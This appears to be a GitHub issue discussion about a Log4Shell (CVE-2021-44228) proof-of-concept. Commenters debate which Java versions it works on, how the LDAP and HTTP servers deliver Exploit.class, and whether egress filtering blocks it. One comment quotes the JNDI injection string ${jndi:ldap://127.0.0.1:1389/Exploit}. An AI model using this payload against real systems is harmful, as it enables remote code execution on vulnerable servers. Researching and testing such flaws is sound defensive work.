CVE-2021-44228-Apache-Log4j-Rce
Important note
In my opinion, the hype around the RCE is a bit excessive. Many bloggers refer to this repo as a working PoC repo. Yes, it works, but not in a realistic environment. I verified that the RCE doesn't work with Java versions greater than 8u121, released on May 18, 2017! After the publication of the new JNDI/LDAP-based attack in 2016, the Java developers stopped remote class loading via JNDI objects. The remote class loading is controlled by the 'com.sun.jndi.rmi.object.trustURLCodebase' property, which is set to 'false' to prevent RCE attacks. This PoC explicitly sets it to 'true' to enable the remote class loading capability. I believe nobody enables this capability on production servers. So, this RCE doesn't work in more than 90% of cases. @tangxiaofeng7 I would recommend reflecting this limitation in the README, as many people think it works against absolutely any product which imports log4j.
Hi, you can take a look at this passage: https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
It can also cause information leakage at the same time. https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
I would say 8u121 only did part of the fix; after 8u191 the setting com.sun.jndi.rmi.object.trustURLCodebase = false is fully enforced.
Anyway, this PoC, which tries to exploit the JNDI reference method, hasn't worked for a long time. As I said, forcing the com.sun.jndi.rmi.object.trustURLCodebase property to 'true', as is done in the repo's sample, is not a realistic scenario. And I believe this should be reflected in the main README.
The PoC doesn't work for me either, using Java 8.0.181-zulu. Can someone please frame the conditions under which the PoC really works? I can compile and run it, but Calc never gets called, using OSX 11.6.
It works for me with JDK 1.8.0_292 (Ubuntu) and JDK 1.8.0_282 (MacOS Big Sur) without extra settings. I put a script at https://github.com/jeffli1024/log4j-rce-test in case you want to quickly verify it.
I tried and received the following:
15:51:14.907 [main] ERROR log4j - ${jndi:ldap://127.0.0.1:1389/Exploit}
I have one question about port 8888 in the example. How does that work? Does port 8888 mean something like looking up the class in the current directory (where the log4j class is)?
It's just a port on which the web server will host the Exploit.class file for remote class loading.
How does this hosting occur?
@AleksandarTokarev Read up on services and web infrastructure to understand how things like Log4j work.
If you don't start the python HTTP server on port 8888, is the remote code still loaded?
I wondered, if the vulnerable server is hosted behind a firewall, is it feasible to access ${jndi:ldap://127.0.0.1:1389/Exploit} or download the code from the web server at 127.0.0.1:8888 at all? In most corporate environments it will be blocked, assuming we are talking about a public IP instead of 127.0.0.1.
Yes, egress filtering helps (at least against all attacks which are publicly known; the German BSI claimed there are connectionless payloads, but I think they just misunderstood the class-download-less attacks, which still rely on connecting to the LDAP/RMI servers in the first place).
However, egress filtering is less common than you might think, even if it is a best-practice baseline. All the vulnerable FAANGs in the world showed that.
Yes, it serves the class file from the local dir after the LDAP/RMI server referenced its URL. However, this is only needed for this type of PoC; it's not needed when you use a more tailored deserialisation payload (which would re-use existing classes, ysoserial-style).